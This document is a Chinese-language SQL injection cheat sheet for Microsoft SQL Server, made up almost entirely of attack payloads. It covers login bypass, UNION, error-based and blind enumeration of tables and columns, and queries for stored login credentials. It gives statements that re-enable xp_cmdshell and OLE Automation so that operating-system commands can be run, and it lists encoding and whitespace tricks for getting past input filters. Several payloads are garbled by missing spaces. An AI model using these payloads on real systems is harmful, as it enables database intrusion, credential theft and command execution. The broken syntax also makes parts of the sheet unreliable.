默认数据库
注释符 (-- 与 /*)
SELECT * FROM Users WHERE username = '' OR 1=1 --' AND password =''; SELECT * FROM Users WHERE id = '' UNION SELECT 1, 2, 3/*';
查询版本信息: @@VERSION
SELECT * FROM Users WHERE id = '1' AND @@VERSION LIKE'%2008%';
查询数据库凭证 (Database..Table): master..syslogins、master..sysprocesses; 当前用户及角色判断: user、system_user、suser_sname()、is_srvrolemember('sysadmin'); 示例: SELECT user, password FROM master.dbo.sysxlogins
SELECT loginame FROM master..sysprocesses WHERE spid=@@SPID; SELECT (CASE WHEN (IS_SRVROLEMEMBER('sysadmin')=1) THEN '1' ELSE'0' END);
查询数据库信息
· SELECT DB_NAME(5); · SELECT name FROM master..sysdatabases;
查询主机名称 (注: 下一行的语句实际返回的是产品版本、补丁级别和版本类型, 而不是主机名)
SELECT SERVERPROPERTY('productversion'), SERVERPROPERTY('productlevel'), SERVERPROPERTY('edition');
查询表和列
确定列数ORDER BY n+1;
漏洞语句: SELECT username, password, permission FROM Users WHERE id = '1';
查询列数如下: 1' ORDER BY 1-- | True | 1' ORDER BY 2-- | True | 1' ORDER BY 3-- | True | 1' ORDER BY 4-- | False - Query is only using 3 columns | -1' UNION SELECT 1,2,3-- | True |
通过 GROUP BY / HAVING 枚举列名
漏洞语句: SELECT username,password, permission FROM Users WHERE id = '1'; 注入语句: 1' HAVING 1=1-- | Column 'Users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. | 1' GROUP BY username HAVING 1=1-- | Column 'Users.password' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. | 1' GROUP BY username, password HAVING 1=1-- | Column 'Users.permission' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. | 1' GROUP BY username, password, permission HAVING 1=1-- | No Error |
查询表
可从以下两个系统视图中查询表信息: information_schema.tables、master..sysobjects
联合查询UNION SELECT name FROM master..sysobjects WHERE xtype='U' |
布尔查询AND SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables > 'A' |
报错查询AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables) | AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name NOT IN(SELECT TOP 1 table_name FROM information_schema.tables)) |
查询列: 可从以下两个系统视图中查询列信息: information_schema.columns、master..syscolumns
联合查询UNION SELECT nameFROM master..syscolumns WHERE id = (SELECT id FROM master..syscolumns WHEREname = 'tablename')
布尔查询AND SELECT SUBSTRING(column_name,1,1) FROMinformation_schema.columns > 'A'
报错查询AND 1 = (SELECT TOP 1 column_name FROM information_schema.columns) | AND 1 = (SELECT TOP 1 column_name FROM information_schema.columns WHERE column_name NOT IN(SELECT TOP 1 column_name FROM information_schema.columns)) |
检索多个表/列1、 AND 1=0; BEGIN DECLARE @xy varchar(8000) SET@xy=':' SELECT @xy=@xy+' '+name FROMsysobjects WHERE xtype='U' AND name>@xy SELECT @xy AS xy INTO TMP_DB END; 2、 AND 1=(SELECT TOP 1 SUBSTRING(xy,1,353) FROMTMP_DB);
3、 AND 1=0; DROP TABLE TMP_DB;
适用于 SQL Server 2005 及以上版本: SELECT table_name %2b ', ' FROM information_schema.tables FOR XML PATH('')
储存过程查询: ' AND 1=0; DECLARE @S VARCHAR(4000) SET@S=CAST(0x44524f50205441424c4520544d505f44423b AS VARCHAR(4000)); EXEC (@S);--
避免单引号SELECT * FROM Users WHERE username = CHAR(97) + CHAR(100) + CHAR(109) + CHAR(105) + CHAR(110) |
字符串拼接SELECT CONCAT('a','a','a'); (SQL SERVER 2012) | |
条件判断: IF 1=1 SELECT 'true' ELSE SELECT 'false'; SELECT CASE WHEN 1=1 THEN true ELSE false END; (注: T-SQL 没有 true/false 布尔字面量, 第二条语句中的 CASE 分支应改为返回 1/0 或字符串, 否则会报列名无效的错误)
时间延迟: WAITFOR DELAY 'time_to_pass'; WAITFOR TIME 'time_to_execute';
IF 1=1 WAITFOR DELAY '0:0:5' ELSE WAITFORDELAY '0:0:0';
执行命令EXEC master.dbo.xp_cmdshell 'cmd';
MSSQL 2005 默认禁用 xp_cmdshell, 可用以下语句开启: EXEC sp_configure 'show advanced options', 1 | EXEC sp_configure reconfigure | EXEC sp_configure 'xp_cmdshell', 1 | EXEC sp_configure reconfigure |
调用wscript执行命令: DECLARE @execmd INT | EXEC SP_OACREATE 'wscript.shell', @execmd OUTPUT | EXEC SP_OAMETHOD @execmd, 'run', null, '%systemroot%\system32\cmd.exe /c echo jumbo' |
如果版本高于sql 2000,需要执行其他查询才能执行上一条命令:
EXEC sp_configure 'show advanced options', 1 | EXEC sp_configure reconfigure | EXEC sp_configure 'OLE Automation Procedures', 1 | EXEC sp_configure reconfigure |
例: 1、把命令结果存入tmp_db ' IF EXISTS (SELECT 1 FROMINFORMATION_SCHEMA.TABLES WHERE TABLE_NAME='TMP_DB') DROP TABLE TMP_DB DECLARE@a varchar(8000) IF EXISTS(SELECT * FROM dbo.sysobjects WHERE id = object_id(N'[dbo].[xp_cmdshell]') AND OBJECTPROPERTY (id, N'IsExtendedProc') = 1) BEGINCREATE TABLE %23xp_cmdshell (name nvarchar(11), min int, max int, config_valueint, run_value int) INSERT %23xp_cmdshell EXEC master..sp_configure'xp_cmdshell' IF EXISTS (SELECT * FROM %23xp_cmdshell WHERE config_value=1)BEGINCREATE TABLE %23Data (dir varchar(8000)) INSERT %23Data EXECmaster..xp_cmdshell 'dir' SELECT @a='' SELECT@a=Replace(@a%2B'<br></font><fontcolor="black">'%2Bdir,'<dir>','</font><fontcolor="orange">') FROM %23Data WHERE dir>@a DROP TABLE %23DataEND ELSE SELECT @a='xp_cmdshell not enabled' DROP TABLE %23xp_cmdshell END ELSESELECT @a='xp_cmdshell not found' SELECT @a AS tbl INTO TMP_DB-- 2、从tmp_db查询内容: ' UNION SELECT tbl FROM TMP_DB--
3、删除tmp_db ' DROP TABLE TMP_DB--
多语句查询' AND 1=0 INSERT INTO ([column1], [column2]) VALUES('value1', 'value2');
混淆: 以下示例中的字符会被当作空字符处理
S%E%L%E%C%T%01column%02FROM%03table; A%%ND 1=%%%%%%%%1; %仅限于ASP(x)环境
以下示例用括号、双引号或方括号代替空格
UNION(SELECT(column)FROM(table)); SELECT"table_name"FROM[information_schema].[tables];
AND/OR 之后可用于代替空格的符号 (见下例中的反斜杠)
SELECT 1FROMWHERE\1=\1AND\1=\1;
编码
URL Encoding SELECT %74able_%6eame FROM information_schema.tables;
SELECT %2574able_%256eame FROM information_schema.tables;
SELECT %u0074able_%u6eame FROM information_schema.tables;
Invalid Hex Encoding (ASP) SELECT %tab%le_%na%me FROM information_schema.tables;
' AND 1=0; DECLARE @S VARCHAR(4000) SET @S=CAST(0x53454c4543542031 AS VARCHAR(4000)); EXEC (@S);--
HTML Entities (Needs to be verified) %26%2365%3B%26%2378%3B%26%2368%3B%26%2332%3B%26%2349%3B%26%2361%3B%26%2349%3B
|